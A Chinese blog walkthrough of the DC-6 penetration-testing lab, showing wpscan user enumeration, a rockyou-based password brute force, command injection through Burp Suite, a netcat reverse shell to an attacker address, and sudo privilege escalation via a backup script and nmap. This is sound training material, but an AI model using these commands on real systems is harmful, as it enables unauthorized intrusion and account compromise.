当前位置:网站首页>DC-6靶场下载及渗透实战详细过程(DC靶场系列)
DC-6靶场下载及渗透实战详细过程(DC靶场系列)
2022-08-03 03:36:00 【金 帛】
目录
DC-6靶场下载地址https://www.five86.com/downloads/DC-6.zip
一. 信息收集
1. 主机扫描
2. 端口扫描
3. 目录扫描
4. 页面信息探测
这里跟DC-2的情况一样,无法直接访问靶机主页面,得修改本地host重定向到wordy
在/etc/hosts文件下,添加
192.168.120.140 wordy
CMS是WordPress5.1.1,这里我们就可以利用针对工具wpscan进行渗透了
二. 渗透过程
1. 用户名枚举
wpscan --url wordy -e u
将得到的用户名,保存在一个文件里,方便稍后爆破
2. 爆破密码
根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > /root/桌面/passwd.txt
生成字典后,继续使用wpscan进行爆破
wpscan --url wordy -U uname.txt -P passwd.txt
成功爆破出一个用户
mark:helpdesk01
访问wp-login.php用该账号密码登入后台
3. 任意命令执行
burpsuite抓包,放到重复器, 修改报文
发现有命令回显,存在任意命令执行漏洞,接着我们反弹shell到kali上,先在kali监听端口9999
nc -lvp 9999
然后执行下面命令进行反弹shell
nc -e /bin/bash 192.168.120.129 9999
反弹shell成功,然后升级交互shell
python -c "import pty;pty.spawn('/bin/bash')"
4. 提权
之前打DC靶场能用的提权方式都试过了,不行,但跟上一关一样,在home目录下找到提示
得到一个账号,graham:Gso7isUM1D4
su graham
在找提权方法时发现
发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件
这是解压某个文件的操作,我们可以利用该文件,切换为jens用户
echo "/bin/bash" > b*
sudo -u jens ./*
发现可以利用nmap进行提权,参考nmap提权,先创建个文件
"os.execute('/bin/bash')" > shell
然后利用--script参数
sudo nmap --script=shell
提权成功
5. 查找flag
find / -name *flag.*
拿到flag
边栏推荐
猜你喜欢
随机推荐
【obs】启动推流失败 : Output.StartStreamFailed 调用流程
【笔记】混淆矩阵和ROC曲线
使用docker容器搭建MySQL主从复制
DOM破环和两个实验的复现
Sentinel vs Hystrix 限流对比,到底怎么选?
电子设备行业智能供应链系统:打破传统供应链壁垒,提升电子设备企业管理效能
uniapp运行到手机,基座提示本应用无法独立运行,需要与hbuilderX 搭配使用
谷粒商城一些疑问总结
【STM32】入门(三):按键使用-GPIO端口输出控制
SkiaSharp 之 WPF 自绘 五环弹动球(案例版)
sql问题,如何能做到先声明表的名称,例如product202201,表示2022年一月份的货物表,再在声明过的表中查找,下面的代码运行时有错误显示找不到表table_name,请问改如何进行修改
【GO记录】从零开始GO语言——用GO语言做一个示波器(二)基于arduino的简易示波器
【基础数学--埃氏筛】204. 计数质数
HI3521D 烧录128M nand flash文件系统过程-一定要注意flash的容量
stdio.h(本机代码)
ROS2自学笔记:机器视觉基础
Task Scheduler 计划定时任务,修改时报错: One or more of the specified arguments are not valid
vscode access denied to unins000.exe
第八章 字符输入输出和输入验证
【剑指offer】——股票的最大利润